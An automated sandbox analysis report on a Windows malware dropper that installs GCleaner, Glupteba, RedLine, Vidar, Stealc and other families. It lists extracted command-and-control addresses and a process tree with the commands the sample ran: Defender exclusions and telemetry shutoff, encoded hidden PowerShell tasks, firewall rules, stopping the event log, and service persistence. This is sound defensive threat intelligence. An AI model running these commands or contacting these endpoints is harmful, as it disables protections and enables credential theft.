gcleaner | e3f3ad550bc7b03e30074356d23946b0ffd5def8e754159e27e27f4e70ef29cf

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
02-04-2024 10:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
Size

4.5MB
MD5

20ed8b8eb556fa3cbc88b83882a6f1b0
SHA1

cd7ce6fc0068b6ef9c37d5dafec1319a39b88709
SHA256

6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421
SHA512

868b859bdff27e41f63b527590214ad22dcaf332bb3d5c7daafd295ea648d71d5bd6d01fee29587eee8b7d4ef01384089eb0b2408f3d2e048021701c357e3b9b
SSDEEP

98304:in1GhDYSAEbWAtdt7Eea0+JJHOBMT6yCltq5CFvxWof8e45D4UO38cYd5:0gYfux7EF0CHqI6Xg5CFvxW2Pe

Malware Config

Extracted

Family

stealc

http://185.172.128.26

Attributes

url_path
/f993692117a3fda2.php

Extracted

Family

vidar

https://steamcommunity.com/profiles/76561199658817715

https://t.me/sa9ok

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

5.42.65.0:29587

Extracted

Family

smokeloader

Version

2022

http://nidoe.org/tmp/index.php

http://sodez.ru/tmp/index.php

http://uama.com.ua/tmp/index.php

http://talesofpirates.net/tmp/index.php

rc4.i32

Extracted

Family

smokeloader

Botnet

pub3

Extracted

Family

gcleaner

185.172.128.90

5.42.65.64

Attributes

url_path
/advdlc.php

Signatures

Detect Vidar Stealer 3 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/2408-609-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral2/memory/2408-614-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral2/memory/2408-602-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7

Detect ZGRat V1 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2592-533-0x0000000000CF0000-0x0000000001380000-memory.dmp	family_zgrat_v1
C:\Users\Admin\Documents\GuardFox\XaGaTSXhNtijen16_0lenmqv.exe	family_zgrat_v1
C:\Users\Admin\Documents\GuardFox\XaGaTSXhNtijen16_0lenmqv.exe	family_zgrat_v1

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2080-641-0x0000000000400000-0x0000000002F43000-memory.dmp	family_glupteba
behavioral2/memory/1640-608-0x0000000005050000-0x000000000593B000-memory.dmp	family_glupteba
behavioral2/memory/2080-714-0x0000000000400000-0x0000000002F43000-memory.dmp	family_glupteba

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4128-612-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

3036 netsh.exe
4420 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

pid	process
3036	netsh.exe
4420	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 11 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Documents\GuardFox\QadmWEMvZP1u5zn6BUZr8mOC.exe	themida
behavioral2/memory/2788-619-0x0000000000680000-0x0000000001654000-memory.dmp	themida
behavioral2/memory/2788-621-0x0000000000680000-0x0000000001654000-memory.dmp	themida
behavioral2/memory/2788-625-0x0000000000680000-0x0000000001654000-memory.dmp	themida
behavioral2/memory/2788-634-0x0000000000680000-0x0000000001654000-memory.dmp	themida
behavioral2/memory/2788-638-0x0000000000680000-0x0000000001654000-memory.dmp	themida
behavioral2/memory/2788-639-0x0000000000680000-0x0000000001654000-memory.dmp	themida
behavioral2/memory/2788-642-0x0000000000680000-0x0000000001654000-memory.dmp	themida
behavioral2/memory/2788-724-0x0000000000680000-0x0000000001654000-memory.dmp	themida
behavioral2/memory/2788-554-0x0000000000680000-0x0000000001654000-memory.dmp	themida
behavioral2/memory/2788-444-0x0000000000680000-0x0000000001654000-memory.dmp	themida

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/2012-574-0x00000000005F0000-0x0000000000EE1000-memory.dmp	vmprotect
behavioral2/memory/2012-613-0x00000000005F0000-0x0000000000EE1000-memory.dmp	vmprotect
C:\Users\Admin\Documents\GuardFox\gi8sxNU7MDQfdTU225Np_T6j.exe	vmprotect

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

34 bitbucket.org
45 bitbucket.org
69 bitbucket.org
25 bitbucket.org
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

5 api.myip.com
8 api.myip.com
10 ipinfo.io
14 ipinfo.io

flow	ioc
34	bitbucket.org
45	bitbucket.org
69	bitbucket.org
25	bitbucket.org

flow	ioc
5	api.myip.com
8	api.myip.com
10	ipinfo.io
14	ipinfo.io

Drops file in System32 directory 4 IoCs

Processes:

6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
File opened for modification	C:\Windows\System32\GroupPolicy	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

3728 sc.exe
4832 sc.exe
1576 sc.exe
2900 sc.exe

pid	process
3728	sc.exe
4832	sc.exe
1576	sc.exe
2900	sc.exe

Program crash 13 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process
1916	756	WerFault.exe
1904	4788	WerFault.exe
3160	2160	WerFault.exe	OB3O4OOzCsPjC3JerYeXP28s.exe
5084	756	WerFault.exe
4440	756	WerFault.exe
4256	756	WerFault.exe
4836	2408	WerFault.exe
1636	756	WerFault.exe
4904	756	WerFault.exe
4756	756	WerFault.exe
3160	756	WerFault.exe
432	2332	WerFault.exe	miI6pz185KVt4jb91OmpgVms.exe
3028	2592	WerFault.exe	XaGaTSXhNtijen16_0lenmqv.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4804 schtasks.exe
4852 schtasks.exe
3728 schtasks.exe
2008 schtasks.exe
3184 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1272 taskkill.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3988 PING.EXE

pid	process
4804	schtasks.exe
4852	schtasks.exe
3728	schtasks.exe
2008	schtasks.exe
3184	schtasks.exe

pid	process
1272	taskkill.exe

pid	process
3988	PING.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe

pid	process
3984	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
3984	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
3984	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
3984	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe

C:\Users\Admin\AppData\Local\Temp\6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
"C:\Users\Admin\AppData\Local\Temp\6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe"
1⤵
- Checks computer location settings
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3984

C:\Users\Admin\Documents\GuardFox\9a4mD7BDoXeoJOcQxdUIpeAK.exe
"C:\Users\Admin\Documents\GuardFox\9a4mD7BDoXeoJOcQxdUIpeAK.exe"
2⤵
PID:2628

C:\Users\Admin\AppData\Local\Temp\7zS4C85.tmp\Install.exe
.\Install.exe
3⤵
PID:4464

C:\Users\Admin\AppData\Local\Temp\7zS5781.tmp\Install.exe
.\Install.exe /vdidM "525403" /S
4⤵
PID:4480

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
5⤵
PID:5052

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
6⤵
PID:4104

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
7⤵
PID:4832

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
7⤵
PID:4612

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
5⤵
PID:2280

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
6⤵
PID:1464

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
7⤵
PID:4948

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
7⤵
PID:5080

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gNiVmqFUp" /SC once /ST 07:33:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
5⤵
- Creates scheduled task(s)
PID:4804

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gNiVmqFUp"
5⤵
PID:2120

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gNiVmqFUp"
5⤵
PID:1632

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "btbwILgIDOMomJfKYB" /SC once /ST 10:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\sXXaMmB.exe\" RD /GPsite_idTzJ 525403 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:4852

C:\Users\Admin\Documents\GuardFox\xwcY_fovQ9Nheje5CV8jHjgo.exe
"C:\Users\Admin\Documents\GuardFox\xwcY_fovQ9Nheje5CV8jHjgo.exe"
2⤵
PID:1640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
PID:4788

C:\Users\Admin\Documents\GuardFox\xwcY_fovQ9Nheje5CV8jHjgo.exe
"C:\Users\Admin\Documents\GuardFox\xwcY_fovQ9Nheje5CV8jHjgo.exe"
3⤵
PID:3208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:3892

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:5080

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies Windows Firewall
PID:4420

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:1632

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:4000

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
4⤵
PID:4476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:4420

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:2752

C:\Users\Admin\Documents\GuardFox\Q1Z5NOZZFZ_QCZ246twJajsv.exe
"C:\Users\Admin\Documents\GuardFox\Q1Z5NOZZFZ_QCZ246twJajsv.exe"
2⤵
PID:2316

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
PID:1636

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
PID:3660

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
PID:2532

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
PID:3024

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "OBGPQMHF"
3⤵
- Launches sc.exe
PID:2900

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
3⤵
- Launches sc.exe
PID:3728

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:1576

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "OBGPQMHF"
3⤵
- Launches sc.exe
PID:4832

C:\Users\Admin\Documents\GuardFox\QadmWEMvZP1u5zn6BUZr8mOC.exe
"C:\Users\Admin\Documents\GuardFox\QadmWEMvZP1u5zn6BUZr8mOC.exe"
2⤵
PID:2788

C:\Users\Admin\Documents\GuardFox\DMJSAzQ6WPPGCt8v99gapGlM.exe
"C:\Users\Admin\Documents\GuardFox\DMJSAzQ6WPPGCt8v99gapGlM.exe"
2⤵
PID:2080

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
PID:2944

C:\Users\Admin\Documents\GuardFox\DMJSAzQ6WPPGCt8v99gapGlM.exe
"C:\Users\Admin\Documents\GuardFox\DMJSAzQ6WPPGCt8v99gapGlM.exe"
3⤵
PID:4612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:1296

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:876

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies Windows Firewall
PID:3036

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:2560

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:1008

C:\Users\Admin\Documents\GuardFox\6fbTxJuydRu9hVB13nmqo6gD.exe
"C:\Users\Admin\Documents\GuardFox\6fbTxJuydRu9hVB13nmqo6gD.exe"
2⤵
PID:3876

C:\Users\Admin\Documents\GuardFox\J7sUa110XhBRTm1KFDbVGpqC.exe
"C:\Users\Admin\Documents\GuardFox\J7sUa110XhBRTm1KFDbVGpqC.exe"
2⤵
PID:1524

C:\Users\Admin\AppData\Local\Temp\is-L9C97.tmp\J7sUa110XhBRTm1KFDbVGpqC.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L9C97.tmp\J7sUa110XhBRTm1KFDbVGpqC.tmp" /SL5="$601CA,1891431,54272,C:\Users\Admin\Documents\GuardFox\J7sUa110XhBRTm1KFDbVGpqC.exe"
3⤵
PID:4620

C:\Users\Admin\AppData\Local\Website Screenshot Generator\wsgen.exe
"C:\Users\Admin\AppData\Local\Website Screenshot Generator\wsgen.exe" -i
4⤵
PID:2784

C:\Users\Admin\AppData\Local\Website Screenshot Generator\wsgen.exe
"C:\Users\Admin\AppData\Local\Website Screenshot Generator\wsgen.exe" -s
4⤵
PID:1604

C:\Users\Admin\Documents\GuardFox\kk9hxkHrD7aKJBoqukjRDGax.exe
"C:\Users\Admin\Documents\GuardFox\kk9hxkHrD7aKJBoqukjRDGax.exe"
2⤵
PID:756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 744
3⤵
- Program crash
PID:1916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 752
3⤵
- Program crash
PID:5084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 796
3⤵
- Program crash
PID:4440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 804
3⤵
- Program crash
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 960
3⤵
- Program crash
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 992
3⤵
- Program crash
PID:1636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 1332
3⤵
- Program crash
PID:4756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "kk9hxkHrD7aKJBoqukjRDGax.exe" /f & erase "C:\Users\Admin\Documents\GuardFox\kk9hxkHrD7aKJBoqukjRDGax.exe" & exit
3⤵
PID:4752

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "kk9hxkHrD7aKJBoqukjRDGax.exe" /f
4⤵
- Kills process with taskkill
PID:1272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 1356
3⤵
- Program crash
PID:3160

C:\Users\Admin\Documents\GuardFox\miI6pz185KVt4jb91OmpgVms.exe
"C:\Users\Admin\Documents\GuardFox\miI6pz185KVt4jb91OmpgVms.exe"
2⤵
PID:2332

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\FCAAEBFHJJ.exe"
3⤵
PID:4208

C:\Users\Admin\AppData\Local\Temp\FCAAEBFHJJ.exe
"C:\Users\Admin\AppData\Local\Temp\FCAAEBFHJJ.exe"
4⤵
PID:3972

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\FCAAEBFHJJ.exe
5⤵
PID:5008

C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
6⤵
- Runs ping.exe
PID:3988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 2448
3⤵
- Program crash
PID:432

C:\Users\Admin\Documents\GuardFox\_p1nia4ZzsIljp9Oe3N9AKjO.exe
"C:\Users\Admin\Documents\GuardFox\_p1nia4ZzsIljp9Oe3N9AKjO.exe"
2⤵
PID:2812

C:\Users\Admin\Documents\GuardFox\22h5zPDU9jBmyosVdDznG9Xi.exe
"C:\Users\Admin\Documents\GuardFox\22h5zPDU9jBmyosVdDznG9Xi.exe"
2⤵
PID:4788

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3520

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 2116
4⤵
- Program crash
PID:4836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 796
3⤵
- Program crash
PID:1904

C:\Users\Admin\Documents\GuardFox\XaGaTSXhNtijen16_0lenmqv.exe
"C:\Users\Admin\Documents\GuardFox\XaGaTSXhNtijen16_0lenmqv.exe"
2⤵
PID:2592

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
3⤵
PID:1532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2592 -s 1016
3⤵
- Program crash
PID:3028

C:\Users\Admin\Documents\GuardFox\MdMHewhckNGFOy6oTTUTHLxR.exe
"C:\Users\Admin\Documents\GuardFox\MdMHewhckNGFOy6oTTUTHLxR.exe"
2⤵
PID:2172

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:2008

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:3184

C:\Users\Admin\Documents\GuardFox\m92sAzi2QnMeaJgKJbkY1J4g.exe
"C:\Users\Admin\Documents\GuardFox\m92sAzi2QnMeaJgKJbkY1J4g.exe"
2⤵
PID:4728

C:\Users\Admin\Documents\GuardFox\gi8sxNU7MDQfdTU225Np_T6j.exe
"C:\Users\Admin\Documents\GuardFox\gi8sxNU7MDQfdTU225Np_T6j.exe"
2⤵
PID:2012

C:\Users\Admin\Documents\GuardFox\OB3O4OOzCsPjC3JerYeXP28s.exe
"C:\Users\Admin\Documents\GuardFox\OB3O4OOzCsPjC3JerYeXP28s.exe"
2⤵
PID:2160

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 792
3⤵
- Program crash
PID:3160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 756 -ip 756
1⤵
PID:4644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4788 -ip 4788
1⤵
PID:3912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2160 -ip 2160
1⤵
PID:576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 756 -ip 756
1⤵
PID:2128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 756 -ip 756
1⤵
PID:4176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 756 -ip 756
1⤵
PID:4300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 756 -ip 756
1⤵
PID:1496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2408 -ip 2408
1⤵
PID:3680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 756 -ip 756
1⤵
PID:3460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3868

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:3380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 756 -ip 756
1⤵
PID:3704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 756 -ip 756
1⤵
PID:2120

C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
1⤵
PID:3992

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:4696

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:2540

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:3028

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:3628

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:4324

C:\Windows\system32\svchost.exe
svchost.exe
2⤵
PID:3008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2332 -ip 2332
1⤵
PID:2616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2592 -ip 2592
1⤵
PID:4296

C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\sXXaMmB.exe
